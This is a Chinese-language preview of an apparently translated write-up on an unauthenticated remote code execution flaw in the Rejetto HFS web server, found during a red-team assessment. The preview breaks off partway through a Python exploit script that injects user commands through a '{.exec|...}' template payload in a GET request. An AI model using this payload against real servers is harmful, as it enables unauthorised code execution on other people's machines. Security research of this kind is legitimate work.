境外黑客组织线索发现思路

文章预览

今天无意中发现了一篇漏洞的文章，下面是文章的翻译。 我刚刚决定分享一个有趣的未授权远程代码执行（Unauthenticated RCE）以及它背后的故事！ Rejetto HTTP文件服务器 在一次红队评估中，我偶然发现了一个神秘的Web应用程序： 这是我在80/tcp端口上遇到的 这个Web应用程序被确认为Rejetto HFS，这是一个曾经流行的Windows Web服务器，首次发布于2002年8月。 快速在线搜索显示2.3m版本没有已知漏洞。然而，我惊讶地发现旧版本有多个RCE！ import  socket url = raw_input( "Enter URL : " ) try :        while   True :             sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)             sock.connect((url,  80 ))             cmd = raw_input( "Enter command (E.g. calc) or press Ctrl+C to exit : " )             req =  "GET /?{.exec|" +cmd+ ".}"             req +=  ………………………………